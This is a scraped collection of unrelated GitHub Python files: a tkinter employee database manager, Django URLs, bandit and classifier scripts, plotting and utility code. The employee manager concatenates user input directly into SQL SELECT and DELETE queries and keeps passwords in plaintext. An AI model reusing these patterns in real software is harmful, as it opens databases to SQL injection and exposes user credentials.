conn.commit()\n conn.close()\n employeeID.delete(0,END)\n main.destroy()\n os.system(\"admin.py\")\n\n\n\ndef clear():\n first_name.delete(0,END)\n last_name.delete(0,END)\n gender.delete(0,END)\n age.delete(0,END)\n address.delete(0,END)\n contact.delete(0, END)\n\ndef update():\n root.withdraw()\n if (employeeID.get()==\"\"):\n messagebox.showinfo(\"Error\",\"Please select employee\")\n else:\n global my_img\n global root1\n root1 = Toplevel()\n root1.geometry(\"1366x768+60+10\")\n root1.title(\"Login\")\n root1.resizable(0, 0)\n\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n record_id = employeeID.get()\n c.execute(\"SELECT*from information WHERE oid = \" + record_id)\n records = c.fetchall()\n global fullname\n global address\n global age\n global gender\n global email\n global Password\n\n my_img = ImageTk.PhotoImage(Image.open('signup.png'))\n my_label=Label(root1,image=my_img).pack()\n fullname_lbl = Label(root1, text=\"Full Name\", font=('Consolas', 15), bg=\"white\")\n fullname_lbl.place(x=180, y=200)\n age_lbl = Label(root1, text=\"Age\", font=('Consolas', 15), bg=\"white\")\n age_lbl.place(x=720, y=200)\n address_lbl = Label(root1, text=\"Address\", font=('Consolas', 15), bg=\"white\")\n address_lbl.place(x=180, y=290)\n gender_lbl = Label(root1, text=\"Gender\", font=('Consolas', 15), bg=\"white\")\n gender_lbl.place(x=720, y=290)\n email_lbl = Label(root1, text=\"Email\", font=('Consolas', 15), bg=\"white\")\n email_lbl.place(x=180, y=380)\n password_lbl = Label(root1, text=\"Password\", font=('Consolas', 15), bg=\"white\")\n password_lbl.place(x=720, y=380)\n\n fullname = Entry(root1, width=40, border=0, font=('Consolas', 15))\n fullname.place(x=180, y=230)\n age = Entry(root1, width=40, border=0, font=('Consolas', 15))\n age.place(x=720, y=230)\n gender = Entry(root1, width=40, border=0, font=('Consolas', 15))\n gender.place(x=720, y=320)\n address = Entry(root1, width=40, border=0, font=('Consolas', 15))\n address.place(x=180, y=320)\n\n email = Entry(root1, width=40, border=0, font=('Consolas', 15))\n email.place(x=180, y=410)\n password = Entry(root1, width=40, border=0, font=('Consolas', 15))\n password.place(x=720, y=410)\n\n\n\n check = IntVar()\n checkbtn = Checkbutton(root1, text=\"Terms and Conditions\", font=('Consolas', 20), bg=\"white\",\n activebackground=\"white\", variable=check, onvalue=1, offvalue=0)\n checkbtn.deselect()\n checkbtn.place(x=525, y=540)\n\n for record in records:\n fullname.insert(0, record[0])\n age.insert(0, record[1])\n address.insert(0, record[2])\n gender.insert(0, record[3])\n email.insert(0, record[4])\n password.insert(0, record[5])\n submit_btn = Button(root1, text=\"SUBMIT\", font=('Consolas', 15), cursor='hand2',\n bg=\"#834dd6\", border=0, activebackground=\"#834dd6\", padx=22, pady=10,\n command=confirm)\n submit_btn.place(x=544, y=630)\n exit_btn = Button(root1, text=\"EXIT\", font=('Consolas', 15), cursor='hand2',\n bg=\"#834dd6\", border=0, activebackground=\"#834dd6\", padx=25, pady=10, )\n exit_btn.place(x=715, y=630)\n\ndef delete():\n if (employeeID.get()==\"\"):\n messagebox.showinfo(\"Error\",\"Please select employee\")\n else:\n root.withdraw()\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n c.execute('DELETE from information WHERE oid= ' + employeeID.get())\n print(\"Deleted successfully\")\n\n conn.commit()\n conn.close()\n employeeID.delete(0, END)\n\n os.system(\"management.py\")\n\ndef confirm():\n global root1\n\n conn = sqlite3.connect('info.db')\n c = conn.cursor()\n c.execute('DELETE from information WHERE oid= ' + employeeID.get())\n print(\"Deleted successfully\")\n\n conn.commit()\n conn.close()\n employeeID.delete(0, END)\n root1.destroy()\n os.system(\"management.py\")\n\n\n\n\ndef search():\n record_id = employeeID.get()\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n conn = sqlite3.connect(\"info.db\")\n c = conn.cursor()\n\n c.execute(\"SELECT rowid, * FROM information WHERE FullName = ?\", (record_id,))\n records = c.fetchall()\n\n for record in records:\n my_tree.insert('', 'end', values=(record))\n\n conn.commit()\n conn.close()\n\n\n\n\n\n\n\n\ndef refresh():\n root.destroy()\n os.system('management.py')\n\n\n\n\n\ndef Exit():\n sure = messagebox.askyesno(\"Exit\", \"Are you sure you want to exit?\", parent=root)\n if sure == True:\n root.destroy()\n\n\n\n\n# desgin\n# -------------------------------------\n\n# image\nmyimage=ImageTk.PhotoImage(Image.open('management.png'))\nLabel(image=myimage).pack()\n\n\n\n\n# entry\nemployeeID=Entry(root,width=55,border=0,font=('Consolas',18))\nemployeeID.place(x=180,y=595)\n# entryID = employeeID.get()\n\n\n\n# buttons\n\nsearchBTN=Button(root,text=\"Search\",font=('Consolas',15),cursor='hand2',padx=35,pady=7,\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\",command = search)\nsearchBTN.place(x=1025,y=585)\n\nupdateBTN=Button(root,text=\"UPDATE \",font=('Consolas',22),cursor='hand2',padx=20,pady=1,\n bg=\"#6b30a6\",border=0,activebackground=\"#6b30a6\",command=update)\nupdateBTN.place(x=220,y=650)\n\ndeleteBTN=Button(root,text=\"DELETE \",font=('Consolas',22),cursor='hand2',\n bg=\"#9d3ca2\",border=0,activebackground=\"#9d3ca2\",padx=20,pady=1, command = delete)\ndeleteBTN.place(x=600,y=650)\nrefreshBTN=Button(root,text=\"REFRESH \",font=('Consolas',22),cursor='hand2',\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\",padx=20,pady=1, command = refresh)\nrefreshBTN.place(x=980,y=650)\n\n\nlogoutBTN=Button(root,text=\"EXIT\",font=('Consolas',18),cursor='hand2',padx=20,pady=1,\n bg=\"#cc469d\",border=0,activebackground=\"#cc469d\", command = exit)\nlogoutBTN.place(x=1122,y=38)\n\n\n\n\n\n\n# tree\nconn=sqlite3.connect('info.db')\nc=conn.cursor()\nc.execute('SELECT * ,oid from information')\nrecords = c.fetchall()\nmy_tree = ttk.Treeview(root)\nmy_tree['columns'] = (\"Sno.\",\"First Name\", \"Last Name\", \"Gender\",\"Age\", \"Address\",\"Contact\")\n\nmy_tree.column(\"#0\", width =0, stretch=NO)\nmy_tree.column(\"Sno.\", anchor=CENTER,width=30)\nmy_tree.column(\"First Name\", anchor=CENTER,width=150)\nmy_tree.column(\"Last Name\", anchor=CENTER,width=120)\nmy_tree.column(\"Gender\", anchor=CENTER,width=40)\nmy_tree.column(\"Age\", anchor=CENTER,width=90)\nmy_tree.column(\"Address\", anchor=CENTER,width=100)\nmy_tree.column(\"Contact\", anchor=CENTER,width=100)\n\nmy_tree.heading(\"#0\", text = \"\", anchor = CENTER)\nmy_tree.heading(\"Sno.\", text = \"Sno\", anchor = CENTER)\nmy_tree.heading(\"First Name\", text = \"First Name\", anchor = CENTER)\nmy_tree.heading(\"Last Name\", text = \"Last Name\", anchor = CENTER)\nmy_tree.heading(\"Gender\", text = \"Gender\", anchor = CENTER)\nmy_tree.heading(\"Age\", text = \"Age\", anchor = CENTER)\nmy_tree.heading(\"Address\", text = \"Address\", anchor = CENTER)\nmy_tree.heading(\"Contact\",text = \"Contact\", anchor = CENTER)\n\nmy_tree.place(x=110,y=90, width=1150, height=420)\n\n\n\n\ncount=0\nfor record in records:\n my_tree.insert(parent='',index='end',iid=count,text=\"Parent\",values=(record[6],record[0],record[1],record[2],record[3],record[4],record[5]))\n count+=1\nconn.commit()\nconn.close()\nroot.mainloop()","repo_name":"uniqstha/loginsystem","sub_path":"management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12376226436","text":"\"\"\"hontone URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom hontone import views\n\n# we will probably need to reevaluate our urls, which will be the home page and how we want to layout\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('login', views.login, name='login'),\n path('logout', views.logout, name='logout'),\n path('users', views.show_users, name='user'), # NOTE: temporary, will only be used to see the users we make\n path('word-decks', views.show_word_decks, name='show_word_decks'),\n path('word-decks/delete-all', views.clear_word_decks, name='clear_word_decks'),\n path('word-decks//delete', views.remove_word_deck, name='remove_word_deck'),\n path('word-decks/', views.show_word_deck, name='show_word_deck'),\n path('word-decks//delete-all', views.clear_word_deck_words, name='clear_word_deck_words'),\n path('word-decks///delete', views.remove_word_deck_word, name='remove_word_deck_word'),\n path('user-words', views.show_words, name='show_words'),\n path('user-words/delete-all', views.clear_words, name='clear_words'),\n path('user-words//delete', views.remove_word, name='remove_word'),\n path('', include('books.urls'))\n]\n","repo_name":"nmport/hontonE","sub_path":"hontone/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72565747749","text":"#!/usr/bin/env python\n# coding:utf-8\n'''创建Sqlite数据库'''\nimport time\nimport os\nimport os.path as osp\nimport sqlite3\nimport random\nimport re\n\ndef mkdir(dir_name):\n if not osp.exists(dir_name):\n os.makedirs(dir_name, exist_ok=True)\n return\n\n\ndef create_database_table(database_path, database, table_name):\n mkdir(database_path)\n database_connect = sqlite3.connect(osp.join(database_path, database))\n print(\"open database:%s successfully\" % database)\n database_cur = database_connect.cursor()\n try:\n database_cur.execute(\n \"create table %s(num INTEGER PRIMARY KEY, target TEXT, name TEXT, timer TEXT);\" % table_name)\n except:\n print(\"table:%s has existed\" % table_name)\n return database_cur, database_connect\n\n\ndef insert_database_table(database_cur, database_connect, table_name, values):\n database_cur.execute(\"INSERT INTO %s VALUES(?,?,?,?);\" % \\\n table_name, (None, values[0], values[1], values[2]))\n database_connect.commit()\n\n\nif __name__ == \"__main__\":\n database_path = './database'\n database = 'demo.sqlite3'\n table_name = 'time_count'\n\n database_cur, database_connect = create_database_table(database_path, database, table_name)\n count = 0\n fruit = ['apple', 'banana', 'bayberry', 'cherry']\n while True:\n target = fruit[random.randint(0, 3)]\n id_name = str(count).zfill(10)[:10]\n now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n values = (target, id_name, now_time)\n insert_database_table(database_cur, database_connect, table_name, values)\n\n count += 1\n # time.sleep(0.5)","repo_name":"LonelyWise/VivaLNKTool","sub_path":"Vivalnk/Test_tool/TestDB.py","file_name":"TestDB.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"46892714048","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom multibandit import BernoulliBandit, Solver, plot_results\n\n# 采用上置信界算法\nclass UCB(Solver):\n '''\n 上置信界算法\n\n 参数:\n bandit:多臂老虎机实例\n coef:不确定性度量在目标函数中的参数\n init_prob:每个杆的期望奖励概率初始化\n '''\n # 初始化\n def __init__(self, bandit, coef, init_prob=1.0):\n super(UCB, self).__init__(bandit)\n self.total_count = 0 # 记录当前时间步\n self.estimates = np.array([init_prob] * self.bandit.K) # 对每个杆的期望奖励估计\n self.coef = coef # 不确定性度量的参数\n\n # 选择该步的动作\n # 使用期望奖励上界最大的杆\n def run_one_step(self):\n self.total_count += 1\n exceed_prob = 1/self.total_count # 超过期望奖励上界的概率(与时间步成反比)\n ucb = self.estimates + self.coef * np.sqrt(\n - np.log(exceed_prob) / (2 * (self.counts + 1))\n )\n # 选取期望奖励上界最大的杆子\n k = np.argmax(ucb)\n r = self.bandit.step(k)\n self.estimates[k] += 1 / (self.counts[k]+1) * (r - self.estimates[k]) # 期望奖励更新公式\n\n return k\n\nif __name__ == \"__main__\":\n # 初始化10-臂老虎机\n np.random.seed(1) # 设定随机数种子\n K = 10 # 10臂老虎机\n bandit_10_arm = BernoulliBandit(K)\n\n np.random.seed(1)\n coef = 1 # 控制不确定性比重的系数\n UCB_solver = UCB(bandit_10_arm, coef)\n UCB_solver.run(5000)\n print('上置信界算法的累积懊悔为:', UCB_solver.regret)\n plot_results([UCB_solver], [\"UCB\"])\n","repo_name":"Neuerliu/deep_reinforcement_learning_notes","sub_path":"代码/第二节_多臂老虎机/ucb.py","file_name":"ucb.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"73189979428","text":"\"\"\"\nThis script will zip the logfile and the database in two different zip files..\n\"\"\"\nimport logging\nimport os\nimport zipfile\nfrom lib import my_env\n\n\ncfg = my_env.init_env(\"vdab\", __file__)\nlogging.info(\"Start Application\")\n\n# Set directories\n# parsed_dir = cfg[\"LogFiles\"][\"parsed_dir\"]\nmerged_fn = cfg[\"LogFiles\"][\"merged_fn\"]\ndb = cfg[\"Main\"][\"db\"]\n\n# Zip merged file first\nlogging.info(\"Start zip {fn}\".format(fn=merged_fn))\n(fp, fn) = os.path.split(merged_fn)\nzipfn = os.path.join(fp, \"{fn}.zip\".format(fn=fn.split(\".\")[0]))\nzipf = zipfile.ZipFile(zipfn, 'w', zipfile.ZIP_DEFLATED)\nzipf.write(merged_fn)\nzipf.close()\n\nlogging.info(\"Start zip {fn}\".format(fn=db))\n(fp, fn) = os.path.split(db)\nzipfn = os.path.join(fp, \"{fn}.zip\".format(fn=fn.split(\".\")[0]))\nzipf = zipfile.ZipFile(zipfn, 'w', zipfile.ZIP_DEFLATED)\nzipf.write(db)\nzipf.close()\nlogging.info(\"End Application\")\n","repo_name":"dirkhpe/vdcs","sub_path":"isamparsing/30_zip_logs.py","file_name":"30_zip_logs.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27394063351","text":"import pandas as pd\nimport pickle\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n\ndef train_mensaje_model():\n # Cargar el conjunto de datos\n data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None, names=['clasificacion', 'categoria', 'mensaje'])\n\n # Convertir las columnas 'clasificacion' y 'categoria' a tipo cadena\n data['clasificacion'] = data['clasificacion'].astype(str)\n data['categoria'] = data['categoria'].astype(str)\n\n # Preprocesar los datos\n vectorizer = CountVectorizer()\n X = vectorizer.fit_transform(data['mensaje'])\n y = data['clasificacion']\n\n # Dividir los datos en conjuntos de entrenamiento y prueba\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n # Entrenar un modelo de Naive Bayes\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n # Calcular la precisión en el conjunto de prueba\n y_pred = clf.predict(X_test)\n classification_accuracy = accuracy_score(y_test, y_pred)\n\n # Guardar el modelo entrenado\n with open('mensaje_model.pkl', 'wb') as file:\n pickle.dump((vectorizer, clf), file)\n\n return classification_accuracy\n\ndef train_llamada_model():\n # Cargar el conjunto de datos desde el archivo CSV\n data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None, names=['clasificacion', 'categoria', 'numero'])\n\n # Convertir la columna 'numero' a tipo cadena\n data['numero'] = data['numero'].astype(str)\n\n # Dividir los datos en conjuntos de entrenamiento y prueba\n X_train, X_test, y_train, y_test = train_test_split(data['numero'], data['clasificacion'], test_size=0.2, random_state=42)\n\n # Preprocesar los datos\n vectorizer = CountVectorizer()\n X_train = vectorizer.fit_transform(X_train)\n X_test = vectorizer.transform(X_test)\n\n # Entrenar un modelo de Naive Bayes\n clf = MultinomialNB()\n clf.fit(X_train, y_train)\n\n # Calcular la precisión del modelo\n y_pred = clf.predict(X_test)\n classification_accuracy = accuracy_score(y_test, y_pred)\n\n # Guardar el modelo entrenado\n with open('llamada_model.pkl', 'wb') as file:\n pickle.dump((vectorizer, clf), file)\n\n return classification_accuracy\n\nimport pandas as pd\n\ndef load_test_data():\n # Cargar los datos de prueba para mensajes\n mensaje_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None, names=['clasificacion', 'categoria', 'mensaje'])\n X_mensaje_test = mensaje_data['mensaje']\n y_mensaje_true = mensaje_data['clasificacion']\n\n\n # Cargar los datos de prueba para llamadas\n llamada_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None, names=['clasificacion', 'categoria', 'numero'])\n X_llamada_test = llamada_data['numero']\n y_llamada_true = llamada_data['clasificacion']\n \n\n return X_mensaje_test, y_mensaje_true, X_llamada_test, y_llamada_true, \n\ndef load_categorias_data():\n # Cargar los datos de categorías para mensajes\n mensaje_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/sms.tsv\", sep='\\t', header=None)\n categorias_mensaje = mensaje_data[1].unique() # La columna de categoría es la segunda columna (índice 1)\n\n # Cargar los datos de categorías para llamadas\n llamada_data = pd.read_csv(\"https://raw.githubusercontent.com/Capacoila/AplicacionAntiSpam/master/Phone%20Number.tsv\", delimiter=\"\\t\", header=None)\n categorias_llamada = llamada_data[1].unique() # La columna de categoría es la segunda columna (índice 1)\n\n return categorias_mensaje, categorias_llamada","repo_name":"Capacoila/AplicacionAntiSpam","sub_path":"block/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16949030163","text":"import multiprocessing\nimport time\n\nstart = time.perf_counter()\n\ndef sleep():\n print('Sleeping 1 second...')\n time.sleep(1)\n print('Waking up dude...')\n\n# Here, we've called two multiprocessing processes\nprocess1 = multiprocessing.Process(target=sleep)\nprocess2 = multiprocessing.Process(target=sleep)\n\n# We need to start them\nprocess1.start()\nprocess2.start()\n\n#With join() method, you set when multiprocessing start, if it's not defined, to it will trigger in the end of execution\nprocess1.join()\nprocess2.join()\n\nfinish = time.perf_counter()\n\nprint(f'Finished in {round(finish-start, 2)} second(s)')","repo_name":"alissonzampietro/beginning-python","sub_path":"parallel_processing/mtprocessing.py","file_name":"mtprocessing.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"39539061140","text":"import xlrd\nimport validators\nfrom newspaper import Article\nfrom os import path\nfrom object_extract.config import *\n\n\ndef extract(data_root):\n \"\"\"\n\n :param data_root:\n :return:\n \"\"\"\n articles = list()\n for tag in FILES:\n file = data_root + tag\n if path.exists(file):\n articles.append(extract_articles(data_root + tag, tag))\n return articles\n\n\ndef extract_articles(excel_file, tag, nlp=False):\n \"\"\"\n Extract links from excel file that is in correct format.\n Correct format: links appear in the second column.\n :param excel_file:\n :param tag:\n :param nlp:\n :return:\n \"\"\"\n spread_sheet = xlrd.open_workbook(excel_file)\n results = list()\n for sheet in spread_sheet.sheets():\n col = sheet.col(ARTICLE)\n counter = 0\n for cell in col:\n if counter == 10:\n break\n link = cell.value\n if validators.url(link):\n article = Article(link)\n try:\n article.download()\n article.parse()\n except:\n continue\n if nlp:\n article.nlp()\n article.tag = tag\n results.append(article)\n counter += 1\n return results\n","repo_name":"kqke/NYT-classifier","sub_path":"object_extract/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"38810501536","text":"# correlation\n\ndef correl(x, y):\n\n xdev = [(i - myMean(x)) for i in x]\n ydev = [(i - myMean(y)) for i in y]\n\n sdev = []\n\n for i in range(len(xdev)):\n sdev.append(xdev[i]*ydev[i])\n\n numer = sum(sdev)\n\n dnom1 = [(i-myMean(x))**2 for i in x]\n dnom2 = [(i-myMean(y))**2 for i in y]\n\n dnom1 = sum(dnom1)**0.5\n dnom2 = sum(dnom2)**0.5\n\n denom = dnom1 * dnom2\n\n stat = numer/denom\n\n return stat\n \n# def cortest(): \n","repo_name":"Kamakshaiah/python-lab","sub_path":"fundamentals/scripts/correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19454743728","text":"from scNodes.core.opengl_classes import *\n\n\nclass ROI:\n MIN_SIZE = 5\n\n def __init__(self, box=[0, 0, 1, 1], colour=(1.0, 1.0, 1.0, 1.0)):\n \"\"\"\n\n :param box: list/tuple with (x_min, y_min, x_max, y_max) coordinates.\n :param colour: colour of the ROI\n \"\"\"\n self.box = list(box)\n self.colour = colour\n self.va = VertexArray(None, None, attribute_format=\"xy\")\n self.use = False\n self.update_va()\n\n def update_va(self):\n left = self.box[0]\n top = self.box[1]\n right = self.box[2]\n bottom = self.box[3]\n coordinates = [left, bottom,\n right, bottom,\n right, top,\n left, top]\n indices = [0, 1, 1, 2, 2, 3, 3, 0]\n self.va.update(VertexBuffer(coordinates), IndexBuffer(indices))\n\n def render(self, shader, camera):\n self.va.bind()\n shader.bind()\n shader.uniformmat4(\"cameraMatrix\", camera.view_projection_matrix)\n shader.uniform3f(\"lineColour\", self.colour)\n shader.uniform3f(\"translation\", [0.0, 0.0, 0.0])\n glDrawElements(GL_LINES, self.va.indexBuffer.getCount(), GL_UNSIGNED_SHORT, None)\n shader.unbind()\n self.va.unbind()\n\n def is_in_roi(self, point):\n return self.box[0] < point[0] < self.box[2] and self.box[1] < point[1] < self.box[3]\n\n def translate(self, shift):\n self.box[0] += int(shift[0])\n self.box[1] += int(shift[1])\n self.box[2] += int(shift[0])\n self.box[3] += int(shift[1])\n self.update_va()\n\n def set_box(self, box):\n self.box = box\n self.visible = True\n if self.box[0] == self.box[2] and self.box[1] == self.box[3]:\n self.visible = False\n self.update_va()\n\n def correct_order(self):\n change = False\n if self.box[2] < self.box[0]:\n self.box[0], self.box[2] = self.box[2], self.box[0]\n change = True\n if self.box[3] < self.box[1]:\n self.box[1], self.box[3] = self.box[3], self.box[1]\n change = True\n if change:\n self.update_va()\n\n def limit(self, width, height):\n if np.abs(self.box[2] - self.box[0]) < ROI.MIN_SIZE:\n self.box[2] += ROI.MIN_SIZE // 2\n self.box[0] -= ROI.MIN_SIZE // 2\n if np.abs(self.box[3] - self.box[1]) < ROI.MIN_SIZE:\n self.box[3] += ROI.MIN_SIZE // 2\n self.box[1] -= ROI.MIN_SIZE // 2\n self.box[0] = min([width, max([0, self.box[0]])])\n self.box[1] = min([height, max([0, self.box[1]])])\n self.box[2] = min([width, max([0, self.box[2]])])\n self.box[3] = min([height, max([0, self.box[3]])])\n self.update_va()\n\n\n\nclass Marker:\n def __init__(self, vertices = None, indices = None, colour = (1.0, 0.0, 1.0, 1.0)):\n self.colour = colour\n self.vertices = vertices\n self.indices = indices\n self.va = VertexArray(attribute_format=\"xy\")\n\n if self.vertices is not None and self.indices is not None:\n self.va.update(VertexBuffer(self.vertices), IndexBuffer(self.indices))\n\n def set_vertices(self, vertices, indices):\n self.vertices = vertices\n self.indices = indices\n self.va.update(VertexBuffer(self.vertices), IndexBuffer(self.indices))\n\n def render_start(self, shader, camera, colour):\n self.colour = colour\n self.va.bind()\n shader.bind()\n shader.uniformmat4(\"cameraMatrix\", camera.view_projection_matrix)\n shader.uniform3f(\"lineColour\", self.colour)\n\n def render(self, shader, translation):\n shader.uniform3f(\"translation\", [translation[0], translation[1], 0.0])\n glDrawElements(GL_LINES, self.va.indexBuffer.getCount(), GL_UNSIGNED_SHORT, None)\n\n def render_end(self, shader):\n shader.unbind()\n self.va.unbind()","repo_name":"bionanopatterning/scNodes","sub_path":"scNodes/core/roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"33990761102","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom pandas_datareader import data as wb\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nacao1=input('CODE: ')\nacao2=input('CODE: ')\nL=[acao1,acao2]\n\na = wb.DataReader(acao1, data_source = 'yahoo', start = '2017-8-1')\nb = wb.DataReader(acao2, data_source = 'yahoo', start = '2017-8-1')\nc = pd.DataFrame()\nfor t in L:\n c[t] = wb.DataReader(t, data_source = 'yahoo', start = '2017-8-1')['Adj Close']\n\n\na['Retorno Simples']=((a['Adj Close']/a['Adj Close'].shift(1))-1)*100\nb['Retorno Simples 2']=((b['Adj Close']/b['Adj Close'].shift(1))-1)*100\n\n\n# In[2]:\n\n\na['Retorno Simples'].plot(color='black',title = 'Variação Diária: %s'%(acao1))\nplt.show()\nb['Retorno Simples 2'].plot(color='red',title = 'Variação Diária: %s'%(acao2))\nplt.show()\n\navg_returns_d_1=a['Retorno Simples'].mean()\nprint('Média de Variação Diária %s: %.3f%s'%(acao1,avg_returns_d_1, '%'))\navg_returns_d_2=b['Retorno Simples 2'].mean()\nprint('Média de Variação Diária %s: %.3f%s'%(acao2,avg_returns_d_2, '%'))\n\navg_returns_d_1=a['Retorno Simples'].mean()*250\nprint('\\nMédia de Variação Anual %s: %.3f%s'%(acao1,avg_returns_d_1,'%'))\navg_returns_d_2=b['Retorno Simples 2'].mean()*250\nprint('Média de Variação Anual %s: %.3f%s'%(acao2,avg_returns_d_2,'%'))\n\n\n# In[3]:\n\n\na['Adj Close'].plot(color='black',title=('%s')%(acao1))\nplt.show()\nb['Adj Close'].plot(color='red',title=('%s')%(acao2))\nplt.show()\n(c/c.iloc[0]*100).plot(color=('black','red'), title = 'Comparativo ')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AndreDaher99/Financial-Analysis-HacktoberFest","sub_path":"Comparativo 2 Ações.py","file_name":"Comparativo 2 Ações.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"29815015107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Created on Sat Oct 24 13:07:38 2020\n# @author: Ajit Johnson Nirmal\n\"\"\"\n!!! abstract \"Short Description\"\n `sm.pl.spatial_distance`: The function allows users to visualize the average shortest distance between phenotypes of interest.\n Run `sm.tl.spatial_distance` before running this function.\n\n## Function\n\"\"\"\n\n# library\nimport pandas as pd\nimport matplotlib\nimport numpy as np\nimport seaborn as sns; sns.set(color_codes=True)\nsns.set_style(\"white\")\n\n\ndef spatial_distance (adata, spatial_distance='spatial_distance',phenotype='phenotype',imageid='imageid',log=False,\n method='heatmap',heatmap_summarize=True,heatmap_na_color='grey',heatmap_cmap='vlag_r',\n heatmap_row_cluster=False,heatmap_col_cluster=False,heatmap_standard_scale=0,\n distance_from=None,distance_to=None,x_axis = None,y_axis = None,facet_by = None,plot_type = None,\n return_data = False, subset_col=None, subset_value=None,\n **kwargs):\n \"\"\"\nParameters:\n\n adata : AnnData object\n\n spatial_distance : string, optional\n In order to locate the spatial_distance data within the AnnData object please provide the output\n label/columnname of `sm.tl.spatial_distance` function.\n\n phenotype : string, required\n Column name of the column containing the phenotype information.\n It could also be any categorical assignment given to single cells.\n\n imageid : string, optional\n Column name of the column containing the image id.\n\n log : bool, optional\n Convert distance to log scale.\n\n method : string, optional\n Three options are available.\n 1) heatmap - generates a heatmap of average shortest distance between all phenotypes.\n 2) numeric - can be used to generate boxplot, violin plot etc between a given set of phenotypes.\n 3) distribution - can be used to generate distribution plots between a given set of phenotypes.\n\n heatmap_summarize : bool, optional\n In the event multiple images are present in the dataset, True allows to calculate the\n average across all the images.\n\n heatmap_na_color : string, optional\n Color for NA values within the heatmap.\n\n heatmap_cmap : string, optional\n Color map to use for continous variables.\n Can be a name or a Colormap instance (e.g. 'magma', 'viridis').\n\n heatmap_row_cluster : bool, optional\n Cluster Rows.\n\n heatmap_col_cluster : bool, optional\n Cluster Columns.\n\n heatmap_standard_scale : int, optional\n Either 0 (rows) or 1 (columns). Whether or not to standardize that dimension,\n meaning for each row or column, subtract the minimum and divide each by its maximum.\n\n distance_from : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n Pass a phenotype of interest. If distance_from is provided and distance_to is not provided,\n the function will plot the average distance from the phenotype of interest to all\n phenotypes present within the dataset.\n\n distance_to : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n Pass a phenotype of interest. The function will plot the average shortest between two phenotypes of\n interest (distance_from and distance_to).\n\n x_axis : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n This determines the elements present in the x-axis of the resultant plot.\n Allowed arguments are: 'group', 'distance', 'imageid'.\n\n y_axis : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n This determines the elements present in the y-axis of the numeric plot and if the user uses the distribution\n plot this argument is used to overlaying multiple categories within the same distribution plot.\n Allowed arguments are: 'group', 'distance', 'imageid'.\n\n facet_by : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument can be used to\n generate sub-plots. Allowed arguments are: 'group', 'imageid'.\n\n plot_type : string, optional\n In the event of using method = 'numeric' or 'distribution', this argument is required.\n For `numeric` plot, the following options are available: “strip”, “swarm”, “box”, “violin”, “boxen”, “point”, “bar”, or 